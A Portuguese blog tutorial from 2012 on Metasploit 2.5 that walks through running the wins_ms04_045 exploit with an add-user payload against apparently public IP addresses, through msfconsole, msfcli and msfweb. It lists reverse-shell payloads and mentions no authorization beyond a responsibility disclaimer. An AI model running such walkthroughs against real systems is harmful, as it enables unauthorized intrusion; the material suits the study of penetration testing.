domingo, 17 de junho de 2012

Tutorial Metasploit

Link para download:

http://www.metasploit.com/

Uma breve introdução:

O Metasploit é um framework criado por H.D.Moore (se quiserem saber mais sobre ele, leiam o livro diario hacker), que serve para elaboração e execução
de um repositório de exploits.

Agora que todos já sabem o que é o Metasploit, vamos aprender a trabalhar com ele. Lembrando que este tutorial só tem o objetivo de aprendizado, cada
um é responsável pelos seus atos.

O sistema que estou utilizando é o linux. Mas como disse, tem também a versão para windows q faz a mesma coisa. Entao levando em consideração q
vc tenha instalado em seu computador e esteja funcionando, iremos aprender agora a dominar esta ferramenta.

O metasploit possui várias ferramentas dentre elas:

msfconsole - metasploit em modo console
msfcli - interface de automatização de penetração e exploração
msflogdump - exibe sessões de arquivos de log
msfplayload - usado para gerar payloads customizados
msfpescan - utilizado para analisar e descompilar executaveis e DLLs
msfencode - um codificador interativo de payload encoder
msfupdate - utilizado para verificar e fazer download de atualização do framework
msfweb - Interface grafica via browser

Eu vou ensinar aqui a utilizar somente tres destas ferramentas(msfconsole, msfcli, msfweb), pois acredito q um verdadeiro fuçador aprenderá sozinho o restante não é mesmo Wink

Se por um acaso algumas pessoas tiverem dificuldade entrem em contato pelo meu e-mail ou por mp Smile

Deixando o blablabla de lado vamos continuar a nossa caminhada...

msfconsole:

Primeiramente digita-se na linha de comando : [root]#./msfconsole

se for no windows só digite msfconsole sem ./, continuando deverá aparecer algo como:

888 888 d8b888
888 888 Y8P888
888 888 888
88888b.d88b. .d88b. 888888 8888b. .d8888b 88888b. 888 .d88b. 888888888
888 888 88bd8P Y8b888 88b88K 888 88b888d8888b888888
888 888 88888888888888 .d888888Y8888b.888 888888888 888888888
888 888 888Y8b. Y88b. 888 888 X88888 d88P888Y88..88P888Y88b.
888 888 888 Y8888 Y888Y888888 88888P'88888P 888 Y88P 888 Y888
888
888
888


+ -- --=[ msfconsole v2.5 [105 exploits - 80 payloads]

msf >

O primeiro comando q deveremos executar será: show

desta forma:


888 888 d8b888
888 888 Y8P888
888 888 888
88888b.d88b. .d88b. 888888 8888b. .d8888b 88888b. 888 .d88b. 888888888
888 888 88bd8P Y8b888 88b88K 888 88b888d8888b888888
888 888 88888888888888 .d888888Y8888b.888 888888888 888888888
888 888 888Y8b. Y88b. 888 888 X88888 d88P888Y88..88P888Y88b.
888 888 888 Y8888 Y888Y888888 88888P'88888P 888 Y88P 888 Y888
888
888
888


+ -- --=[ msfconsole v2.5 [105 exploits - 80 payloads]

msf > show
msfconsole: show: requires an option: 'exploits', 'payloads', 'encoders', or 'nops'
msf >

Viram q apareceu as opções deste comando não é.

Para vcs saberem quais os exploits que existem neste framework basta digitar o comando: show exploits;
Para saber os payloads que existem neste framework basta digitar o comando: show payloads e assim por diante.

Entao dentro do ambiente do metasploit escolhemos o exploit assim:

888 888 d8b888
888 888 Y8P888
888 888 888
88888b.d88b. .d88b. 888888 8888b. .d8888b 88888b. 888 .d88b. 888888888
888 888 88bd8P Y8b888 88b88K 888 88b888d8888b888888
888 888 88888888888888 .d888888Y8888b.888 888888888 888888888
888 888 888Y8b. Y88b. 888 888 X88888 d88P888Y88..88P888Y88b.
888 888 888 Y8888 Y888Y888888 88888P'88888P 888 Y88P 888 Y888
888
888
888


+ -- --=[ msfconsole v2.5 [105 exploits - 80 payloads]

msf > use wins_ms04_045
msf wins_ms04_045 >

viram que eu escolhi o wins_ms04_045 e o prompt mudou Smile!!!! Utilizando para isto o comando: use

continuando...

Digitamos o nosso velho amigo : show , novamente para verificar quais atributos ele aceita . Vejamos:

msf wins_ms04_045 > show
msfconsole: show: specify 'targets', 'payloads', 'options', or 'advanced'
msf wins_ms04_045 >

Vimos aqui q ele aceita targets, payloads, options ou advanced.

Vamos verificar quais opcoes este exploit aceita:

msf wins_ms04_045 > show options

Exploit Options
===============

Exploit: Name Default Description
-------- ------ ------- ------------------
required RHOST The target address
required RPORT 42 The target port

Target: Target Not Specified

msf wins_ms04_045 >

Este exploit aceita somente duas opcoes : o ip alvo e a porta alvo. Smile!!!!

Entao agora vc deve esta se perguntando como faço para utilizar isto. Simples, basta vc setar o q ele aceita, lembrando q onde estiver escrito required,
significa q estas opcoes tem q ser setadas obrigatoriamente para o exploit funcionar. Continuando...

Faça assim:

msf wins_ms04_045 > set RHOST 200.126.35.34
RHOST -> 200.126.35.34
msf wins_ms04_04>

msf wins_ms04_045 > set RPORT 42
RPORT -> 42
msf wins_ms04_045 >

Vejam q utilizei a mesma porta q o valor default...

Agora teremos q setar o payload para o nosso exploit. O payload nada mais é q um software acoplado ao exploit para fazer as mais variadas tarefas.

Digitamos entao o comando para saber os payloads suportados pelo nosso exploit: show payloads

msf wins_ms04_045 > show payloads

Metasploit Framework Usable Payloads
====================================

win32_adduser Windows Execute net user /ADD
win32_bind Windows Bind Shell
win32_bind_dllinject Windows Bind DLL Inject
win32_bind_meterpreter Windows Bind Meterpreter DLL Inject
win32_bind_stg Windows Staged Bind Shell
win32_bind_stg_upexec Windows Staged Bind Upload/Execute
win32_bind_vncinject Windows Bind VNC Server DLL Inject
win32_exec Windows Execute Command
win32_passivex Windows PassiveX ActiveX Injection Payload
win32_passivex_meterpreter Windows PassiveX ActiveX Inject Meterpreter Payload
win32_passivex_stg Windows Staged PassiveX Shell
win32_passivex_vncinject Windows PassiveX ActiveX Inject VNC Server Payload
win32_reverse Windows Reverse Shell
win32_reverse_dllinject Windows Reverse DLL Inject
win32_reverse_meterpreter Windows Reverse Meterpreter DLL Inject
win32_reverse_ord Windows Staged Reverse Ordinal Shell
win32_reverse_ord_vncinject Windows Reverse Ordinal VNC Server Inject
win32_reverse_stg Windows Staged Reverse Shell
win32_reverse_stg_upexec Windows Staged Reverse Upload/Execute
win32_reverse_vncinject Windows Reverse VNC Server Inject

msf wins_ms04_045 >

Eu vou escolher o primeiro payload, q faz com q seja adicionado remotamente um usuario no sistema windows Smile

Assim:

msf wins_ms04_045 > set PAYLOAD win32_adduser teste
PAYLOAD win32_adduser -> teste
msf wins_ms04_045>

Vamos agora listar os sistemas operacionais q serão os alvos: Utilizando o velho comando : show, só q agora assim: show targets

msf wins_ms04_045 > show targets

Supported Exploit Targets
=========================

0 Windows 2000 English

msf wins_ms04_045 >

Só temos uma opcao aqui, somente o windows 2000 em ingles é vulneravel, mas tudo bem...

msf wins_ms04_045 > set TARGET 0
TARGET -> 0
msf wins_ms04_045 >

blz, agora basta somente uma coisa para completar nossa tarefa... Executar o nosso exploit, q ta mais para um pacote exploit do q somente um exploit.

Digite somente: exploit

msf wins_ms04_045 > exploit

E pronto...Acabamos a nossa primeira etapa, agora vamos passar para o msfcli.

O msfcli é utilizado para poder fazer tudo de uma só vez. Nao precisando do passo a passo descrito acima. Se nós ja conhecemos o exploit isto agiliza
muito o nosso trabalho na linha de comando digitamos assim:

[root]#./msfcli wins_ms04_045 RHOST =200.156.23.25 RPORT=42 PAYLOAD=win32_adduser teste TARGET=0 E

e vejam q fará a mesma coisa q no modo console.

Vamos passar para uma forma ainda mais fácil. Garanto q a garotada q utiliza o windows irao adorar esta forma.

Trata-se da ferramenta msfweb q quando executado permite fazermos tudo por uma pagina web. para isto faça

[root]#./msfweb
+----=[ Metasploit Framework Web Interface (ip:55555)

Deixe rodando... Abra em seguida o browser e digite na url: seu ip, localhost, 127.0.0.1... Mais a porta 55555

Seria assim: http://localhost:55555

E vcs verão a mágica desta ferramenta.

Poderemos com isto fazer tudo graficamente sem digitar comandos etc etc, somente selecionando.

Pessoal, obrigado pela paciencia e espero com este tutorial ter ajudado muitas pessoas aqui. No mais, abraços a todos os usuários.

← Postagem mais recente Postagem mais antiga → Página inicial

0 comentários:

Postar um comentário

Copyright © Hacking & Security | Powered by Xandao Design by Xandao86 | Xandao86